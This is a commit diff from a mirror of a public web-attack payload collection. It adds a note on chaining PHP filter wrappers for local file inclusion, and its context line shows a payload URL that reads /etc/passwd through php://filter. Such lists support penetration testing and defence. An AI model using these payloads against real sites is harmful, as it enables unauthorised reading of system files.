mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
LDAP fix typo + LDAP attributes + LFI filter chaining
This commit is contained in:
@@ -151,6 +151,8 @@ can be chained with a compression wrapper for large files.
|
||||
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
|
||||
```
|
||||
|
||||
NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
|
||||
|
||||
### Wrapper zip://
|
||||
|
||||
```python
|
||||
|
||||
Reference in New Issue
Block a user